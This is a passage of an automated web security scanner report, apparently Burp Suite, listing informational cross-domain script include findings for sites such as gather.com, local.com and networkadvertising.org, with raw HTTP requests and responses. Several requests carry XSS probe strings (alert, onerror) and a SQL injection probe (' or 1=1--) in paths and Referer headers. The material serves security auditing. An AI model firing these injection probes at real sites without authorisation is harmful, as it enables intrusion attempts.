Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.126.34
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:46 GMT
Content-Length: 12041

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
19.54. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?api_key=184150621627178&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df435cdcb4%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fdelish&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.235.67
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Length: 13304

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
19.55. http://www.gather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.gather.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:42 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Pragma: no-cache
Cache-Control: no-cache, no-store, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 61721
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End comScore Tag -->


<script src="http://i.simpli.fi/dpx.js?cid=55&pid=0&m=1"></script>
...[SNIP]...
19.56. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cookie: gathersid=1025; ref=direct_www; __utma=185998783.481654380.1316295856.1316295856.1316295856.1; __utmb=185998783.2.10.1316295856; __utmc=185998783; __utmz=185998783.1316295856.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=7D0289D9CFA30C47BDC64A59981FBAD1; vis=uNYzOQs1IZ5oyxdbD7V4NADBAJMPjbko1GpsqdeX97e3OXGAKiKOQnzi9JIbB5FPPDPGWSOmhkGSHc26F35QPbfU6cjwhBowFwFyN5J548WK04yVTSDXC+8B6N5ntJgz; __qca=P0-1020474271-1316295803759

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:05:18 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17600
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script src="http://i.simpli.fi/dpx.js?cid=55&pid=0&m=1"></script>
...[SNIP]...
19.57. http://www.gather.com/URI+SYNTAX+EXCEPTION  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /URI+SYNTAX+EXCEPTION

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /URI+SYNTAX+EXCEPTION HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JSESSIONID=642B4580EDE3E511BE324FC3053BDCDC

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:03:56 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 17554
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script src="http://i.simpli.fi/dpx.js?cid=55&pid=0&m=1"></script>
...[SNIP]...
19.58. http://www.gather.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:02 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 22116
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-f9eIEHI8DewDI&callback=qc_results"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script src="http://i.simpli.fi/dpx.js?cid=55&pid=0&m=1"></script>
...[SNIP]...
19.59. http://www.kaboodle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B%00x1642526051; Expires=Mon, 16-Sep-2013 16:30:31 GMT; Path=/
Set-Cookie: rc=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rc=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:30:30 GMT
Content-Length: 85304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript">var NREUM
...[SNIP]...
<!-- AUDIENCESCIENCE pixel tracking AD TAG CODE -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
<!-- START safecount JS include -->
<script src="http://content.dl-rms.com/rms/28067/nodetag.js"></script>
...[SNIP]...
19.60. http://www.kampyle.com/feedback_form/ff-feedback-form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:57:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGw%3D; expires=Sat, 17-Sep-2011 17:57:30 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:57:30 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17861
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://d3a49zm9bincvs.cloudfront.net/css/1314193698/feedback-form.css" />
<script type="text/javascript" src="http://d3a49zm9bincvs.cloudfront.net/js/1315482464/feedback-form.js"></script>
<script type="text/javascript" src="http://d3a49zm9bincvs.cloudfront.net/js/1315482464/flash.js"></script>
...[SNIP]...
19.61. http://www.local.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 17 Sep 2011 16:28:13 GMT
ntCoent-Length: 41848
Server: Microsoft-IIS/7.5
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950; domain=local.com; expires=Mon, 17-Oct-2011 16:24:37 GMT; path=/
Set-Cookie: localcom_yb=cid=&sid=d203b7ed-9cb0-408b-8e12-09063ee6aa44&exp=634518500771604950; domain=local.com; expires=Sat, 17-Sep-2011 16:54:37 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-us" >
<head><title>Local.com - Search for local businesses,
...[SNIP]...
</div>

   <script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
   

   <script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw="></script>
...[SNIP]...
19.62. http://www.localedge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localedge.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.localedge.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/localedge.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:26:15 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
Last-Modified: Tue, 13 Sep 2011 18:36:26 GMT
ETag: "ac020-6b78-4e6fa2aa"
Accept-Ranges: bytes
Content-Length: 27512
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</body>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.1.1.js"></script>

<!-- include Cycle plugin -->
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.74.js"></script>
...[SNIP]...
19.63. http://www.manilla.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manilla.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.manilla.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:35:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding, Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 21703

<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<!--[if IE]><![endif]-->
   <title>Manilla &raquo; Free Online Account and Bill Organizer</title>
   <meta name="description" content="Ma
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js?ver=1.5.2'></script>
...[SNIP]...
19.64. http://www.misquincemag.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.misquincemag.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=48
Date: Sat, 17 Sep 2011 16:33:16 GMT
Content-Length: 41975
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<!-- ShareThis -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cmyspace%2Cstumbleupon%2Cmeneame%2Ccare2%2Cdigg%2Cdelicious%2Cybuzz%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cfriendfeed%2Ckirtsy&amp;linkfg=%235a5189&amp;offsetLeft=-240;onmouseover=false"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<!-- Audience Science script -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
19.65. http://www.networkadvertising.org/managing/opt_out.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:32 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td valign=top><script src="http://www.tribalfusion.com/optout/verify.js?nocache=0.2868087" language="JavaScript"></script>
...[SNIP]...
19.66. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:14:24 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td valign=top width="15" height="15">
       <script src=http://www.tribalfusion.com/optout/optout.js language=JavaScript></script>
...[SNIP]...
19.67. http://www.quickandsimple.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
